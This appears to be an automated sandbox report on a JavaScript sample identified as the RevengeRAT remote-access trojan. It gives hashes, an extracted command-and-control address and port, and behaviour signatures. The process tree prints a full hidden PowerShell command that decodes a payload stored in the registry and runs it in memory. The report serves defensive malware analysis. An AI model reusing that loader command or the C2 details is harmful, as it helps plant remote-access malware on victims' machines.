Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 02:09
Static task
static1
Behavioral task
behavioral1
Sample
07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2.js
Resource
win10v2004-20241007-en
General
-
Target
07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2.js
-
Size
256KB
-
MD5
d9502fb08720229c43e883d68c39258c
-
SHA1
fd889a14456fd1f3a862e6b1d647049c0b63674c
-
SHA256
07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2
-
SHA512
bbdc0c079953acc89e25a654445e36a3b4414b527d67137be752b5101562b12c01643a0468edd02ef30baebe9e3098419073f1ff0c7db512b1b57299e72ab7a2
-
SSDEEP
6144:o0hOy97siZVxLcCIaqIgj2U1Ska535/KBsSTJ/cK144AGxayi7jcvB3zJFCIc:o0hO27siLxLWrpVM
Malware Config
Extracted
revengerat
NyanCatRevenge
13.49.66.229:333
8a25aa6e78e44708a
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Blocklisted process makes network request 33 IoCs
flow pid Process 2 2536 powershell.exe 3 2536 powershell.exe 4 2536 powershell.exe 5 2536 powershell.exe 6 2536 powershell.exe 7 2536 powershell.exe 8 2536 powershell.exe 9 2536 powershell.exe 10 2536 powershell.exe 11 2536 powershell.exe 12 2536 powershell.exe 13 2536 powershell.exe 14 2536 powershell.exe 15 2536 powershell.exe 16 2536 powershell.exe 17 2536 powershell.exe 18 2536 powershell.exe 19 2536 powershell.exe 20 2536 powershell.exe 21 2536 powershell.exe 22 2536 powershell.exe 23 2536 powershell.exe 24 2536 powershell.exe 25 2536 powershell.exe 26 2536 powershell.exe 27 2536 powershell.exe 28 2536 powershell.exe 29 2536 powershell.exe 30 2536 powershell.exe 31 2536 powershell.exe 32 2536 powershell.exe 33 2536 powershell.exe 34 2536 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2536 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2536 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2100 wrote to memory of 2536 2100 wscript.exe 30 PID 2100 wrote to memory of 2536 2100 wscript.exe 30 PID 2100 wrote to memory of 2536 2100 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\07c41d727f11d4594a6591b644eff38c253e44d4cb908cecfdc66b36dae238e2.js1⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\' -name 'KeyName').KeyName;$_b=$_b.replace('~','40');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536
-